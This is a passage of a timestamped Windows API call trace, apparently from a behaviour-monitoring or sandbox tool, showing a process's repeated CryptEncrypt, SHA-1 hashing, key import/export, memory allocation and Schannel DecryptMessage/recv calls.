dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] malloc (_Size=0x1fd) returned 0x60e8c8 [0190.354] free (_Block=0x0) [0190.354] free (_Block=0x60e6c0) [0190.354] free (_Block=0x606108) [0190.354] malloc (_Size=0x1fd) returned 0x60e6c0 [0190.354] free (_Block=0x0) [0190.354] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.354] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.355] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.356] malloc (_Size=0x1fd) returned 0x606108 [0190.356] free (_Block=0x0) [0190.356] free (_Block=0x60e8c8) [0190.356] malloc (_Size=0x1fd) returned 0x60e8c8 [0190.356] free (_Block=0x0) [0190.356] CryptDuplicateHash (in: hHash=0x3e0bd8, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0190.357] CryptHashData (hHash=0x432c78, pbData=0x60e8c8, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0190.357] malloc (_Size=0x14) returned 0x3f65280 [0190.357] free (_Block=0x0) [0190.357] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339faec) returned 1 [0190.357] CryptHashData (hHash=0x3e0bd8, pbData=0x60e8c8, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0190.357] free (_Block=0x3f65280) [0190.357] CryptDestroyHash (hHash=0x432c78) returned 1 [0190.357] free (_Block=0x60e8c8) [0190.357] free (_Block=0x60e6c0) [0190.357] malloc (_Size=0x1fd) returned 0x60e6c0 [0190.357] free (_Block=0x0) [0190.357] malloc (_Size=0x94) returned 0x3594e80 [0190.357] free (_Block=0x0) [0190.357] malloc (_Size=0x94) returned 0x36918f0 [0190.357] free (_Block=0x0) [0190.357] free (_Block=0x0) [0190.357] free (_Block=0x3594e80) [0190.358] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x432c78) returned 1 [0190.361] CryptExportKey (in: hKey=0x432c78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0190.361] CryptExportKey (in: hKey=0x432c78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0190.361] malloc (_Size=0x80) returned 0x60a248 [0190.361] free (_Block=0x0) [0190.361] CryptDestroyKey (hKey=0x432c78) returned 1 [0190.361] malloc (_Size=0x64) returned 0x60b000 [0190.361] free (_Block=0x0) [0190.361] malloc (_Size=0x80) returned 0x609cf8 [0190.361] free (_Block=0x0) [0190.361] malloc (_Size=0xc0) returned 0x3f68b58 [0190.361] free (_Block=0x609cf8) [0190.361] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0190.361] CryptHashData (hHash=0x432c78, pbData=0x3f68b58, dwDataLen=0x81, dwFlags=0x0) returned 1 [0190.361] malloc (_Size=0x14) returned 0x3f654e0 [0190.361] free (_Block=0x0) [0190.361] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f654e0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f654e0, pdwDataLen=0x339fa54) returned 1 [0190.362] CryptDestroyHash (hHash=0x432c78) returned 1 [0190.362] free (_Block=0x3f654e0) [0190.362] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0190.362] CryptHashData (hHash=0x432c78, pbData=0x3f68b58, dwDataLen=0x81, dwFlags=0x0) returned 1 [0190.362] malloc (_Size=0x14) returned 0x3f65280 [0190.362] free (_Block=0x0) [0190.362] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0190.362] CryptDestroyHash (hHash=0x432c78) returned 1 [0190.362] free (_Block=0x3f65280) [0190.362] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0190.362] CryptHashData (hHash=0x432c78, pbData=0x3f68b58, dwDataLen=0x81, dwFlags=0x0) returned 1 [0190.362] malloc (_Size=0x14) returned 0x3f65280 [0190.362] free (_Block=0x0) [0190.362] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0190.362] CryptDestroyHash (hHash=0x432c78) returned 1 [0190.363] free (_Block=0x3f65280) [0190.363] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0190.363] CryptHashData (hHash=0x432c78, pbData=0x3f68b58, dwDataLen=0x81, dwFlags=0x0) returned 1 [0190.363] malloc (_Size=0x14) returned 0x3f65280 [0190.363] free (_Block=0x0) [0190.363] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0190.363] CryptDestroyHash (hHash=0x432c78) returned 1 [0190.363] free (_Block=0x3f65280) [0190.363] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0190.363] CryptHashData (hHash=0x432d78, pbData=0x3f68b58, dwDataLen=0x81, dwFlags=0x0) returned 1 [0190.364] malloc (_Size=0x14) returned 0x3f652c0 [0190.364] free (_Block=0x0) [0190.364] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339fa54) returned 1 [0190.364] CryptDestroyHash (hHash=0x432d78) returned 1 [0190.364] free (_Block=0x3f652c0) [0190.364] free (_Block=0x3f68b58) [0190.364] malloc (_Size=0x50) returned 0x3d9afb8 [0190.364] free (_Block=0x0) [0190.365] free (_Block=0x60b000) [0190.365] free (_Block=0x60a248) [0190.365] malloc (_Size=0xb8) returned 0x3f68b58 [0190.365] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3f68c08 | out: phHash=0x3f68c08) returned 1 [0190.365] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3f68c0c | out: phHash=0x3f68c0c) returned 1 [0190.365] CryptHashData (hHash=0x432d78, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0190.365] CryptHashData (hHash=0x432c78, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0190.365] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x4327b8) returned 1 [0190.365] CryptSetKeyParam (hKey=0x4327b8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0190.366] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x4329b8) returned 1 [0190.366] CryptSetKeyParam (hKey=0x4329b8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0190.366] free (_Block=0x3d9afb8) [0190.366] SetEvent (hEvent=0x3a4) returned 1 [0190.366] SetEvent (hEvent=0x3a4) returned 1 [0190.366] free (_Block=0x36918f0) [0190.366] free (_Block=0x60e6c0) [0190.367] free (_Block=0x606108) [0190.367] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0190.367] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0191.005] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0191.006] malloc (_Size=0x1fd) returned 0x606108 [0191.006] free (_Block=0x0) [0191.006] malloc (_Size=0x1fd) returned 0x3d81e60 [0191.006] free (_Block=0x0) [0191.006] free (_Block=0x0) [0191.006] free (_Block=0x606108) [0191.006] malloc (_Size=0x1fd) returned 0x606108 [0191.006] free (_Block=0x0) [0191.006] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.006] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.007] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.008] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, 